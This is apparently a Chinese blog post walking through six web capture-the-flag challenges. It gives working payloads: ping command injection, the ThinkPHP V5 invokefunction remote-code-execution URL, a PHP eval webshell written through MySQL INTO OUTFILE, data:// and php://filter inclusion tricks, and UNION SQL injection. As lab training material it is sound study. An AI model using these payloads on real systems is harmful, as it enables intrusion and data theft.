【攻防世界WEB】难度二星6分:webshell、command_execution、xff_referer、php

举报
黑色地带(崛起) 发表于 2023/01/28 00:26:56 2023/01/28
【摘要】 【攻防世界WEB】难度二星6分:webshell、command_execution、xff_referer、php

前言:

介绍: 

博主:网络安全领域狂热爱好者。

殊荣:华为云博主、CSDN网络安全领域优质创作者(CSDN:黑色地带(崛起)),2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。

擅长:对于技术、工具、漏洞原理、黑产打击的研究。


导读:

面向读者:对于网络安全方面的学者。


 目录

一、webshell

解题方法:

过程

二、command_execution

解题方法:

过程

三、xff_referer

解题方法:

过程

四、php_rce

解题方法:

过程:

五、Web_php_include

解题方法:

过程1:

过程2:

六、NewsCenter

解题方法:

过程




一、webshell

编辑



解题方法:

1、使用蚁剑(菜刀、冰蝎)进行连接


 知识点:

中国蚁剑使用,及修改蚁剑特征 https://blog.csdn.net/qq_53079406/article/details/123302775?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165840515916782184690711%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165840515916782184690711&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-123302775-null-null.185%5Ev2%5Econtrol&utm_term=%E8%9A%81%E5%89%91&spm=1018.2226.3001.4450


过程

知道URL,知道密码

编辑



连接
编辑

双击进去URL看见flag了

编辑

 编辑





二、command_execution

编辑



解题方法:

1、ping夹带系统命令执行




过程

可能存在命令执行漏洞,在ping之后夹带了系统命令

127.0.0.1;ls /

(ping自己主机,并查看目录)

编辑




使用find(全局查找)函数查找flag,并获得其路径

/home/flag.txt

编辑


获取文件内容

127.0.0.1;cat /home/flag.txt

编辑




三、xff_referer

编辑



解题方法:

1、伪造ip和网站来源




过程

bp拦截请求

编辑

添加X-Forwarded-For

123.123.123.123

然后放包

编辑

提示:必须来自https://www.google.com

编辑


添加referer

https://www.google.com

再放包

编辑



编辑





四、php_rce

编辑



解题方法:

1、查看robots.txt文件


过程:

寻找ThinkPHP V5利用工具

编辑


利用已知漏洞,如

index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=后面接命令

……



利用漏洞寻找工具

环境python2.7

编辑

 编辑

编辑






查看目录(可以往根目录一直查)

http://61.147.171.105:53830/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

编辑


http://61.147.171.105:53830/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20../../../

编辑



 可以直接全局查找

http://61.147.171.105:53830/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

编辑



查看内容

http://61.147.171.105:53830/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

编辑






五、Web_php_include

编辑



解题方法:

1、写入一句话木马,后连接

2、使用php伪协议




过程1:

扫描到后台

编辑


不需要尝试爆破,因为密码为空

编辑


查询参数secure-file-priv

show variables like "secure_file_priv";

secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的编辑

 就可以上传一句话木马上去了

select "<?php eval($_POST['1']); ?>"into outfile '/tmp/1.php'

编辑


 连接到一句话木马编辑编辑

 编辑



过程2:

data://用来执行PHP代码

?page=data://text/plain,<?php system("ls")?>

也可将要执行的命令进行base64加密

?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
编辑


php://filter用于读取源码

http://61.147.171.105:51359?page=PHP://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php
编辑

 对其进行解码

编辑







六、NewsCenter

编辑



解题方法:

1、SQL注入




过程

有输入框,可能是存在注入点了

编辑


 可以使用acunetix等工具对URL进行漏扫

可以看到SQL盲注

编辑



接下来可以手工,也可以用sqlmap跑

可以判断出字段数位3;且回显位为2,3

1' union select 1,2,3#

1' union select 1,2,3,4#(报错)

编辑

爆库

1' union select 1,database(),user()#编辑

 爆表

1' union select 1,group_concat(table_name),3 from information_schema.columns where table_schema=database() #

编辑

 依次排查每个表中的字段

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='secret_table' #

编辑

 爆数据

1' union select 1,2,(select group_concat(id,0x3a,fl4g) from secret_table) #

编辑


 或者使用sqlmap(我感觉跑起来挺慢的,还没手工快)


【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。